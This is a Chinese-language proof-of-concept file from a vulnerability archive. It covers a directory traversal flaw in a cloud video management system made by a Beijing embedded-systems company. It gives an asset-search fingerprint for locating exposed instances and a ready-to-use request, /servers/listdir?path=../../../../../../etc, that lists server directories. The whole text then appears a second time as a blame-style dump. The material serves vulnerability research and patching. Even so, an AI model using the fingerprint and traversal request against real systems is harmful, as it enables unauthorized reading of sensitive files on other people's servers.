POC/wpoc/北京雷石天地电子技术有限公司/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md

# 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞

# 一、漏洞简介
北京雷石天地电子技术有限公司是一家从事现代宽带技术领域和信息家电领域中嵌入式系统软件的研究与开发应用的公司。 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞，攻击者可利用该漏洞获取敏感信息。

# 二、影响版本
+ 云视频管理系统

# 三、资产测绘
+ hunter`web.body="/mediaimport/getIsAddData"`
+ 特征

![1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1.png](./img/8yIVQ8yg93MZfzTM/1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1-706309.png)

# 四、漏洞复现
```java
/servers/listdir?path=../../../../../../etc
```

![1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6.png](./img/8yIVQ8yg93MZfzTM/1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6-211600.png)


> 更新: 2024-02-29 23:57:11  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy632nmy8tt4g795>
first commit 2025-03-04 23:12:57 +08:00			`# 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞`

			`# 一、漏洞简介`
			`北京雷石天地电子技术有限公司是一家从事现代宽带技术领域和信息家电领域中嵌入式系统软件的研究与开发应用的公司。北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞，攻击者可利用该漏洞获取敏感信息。`

			`# 二、影响版本`
			`+ 云视频管理系统`

			`# 三、资产测绘`
			+ hunter`web.body="/mediaimport/getIsAddData"`
			`+ 特征`

			`![1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1.png](./img/8yIVQ8yg93MZfzTM/1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1-706309.png)`

			`# 四、漏洞复现`
			```java
			`/servers/listdir?path=../../../../../../etc`
			```

			`![1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6.png](./img/8yIVQ8yg93MZfzTM/1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6-211600.png)`



			`> 更新: 2024-02-29 23:57:11`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy632nmy8tt4g795>`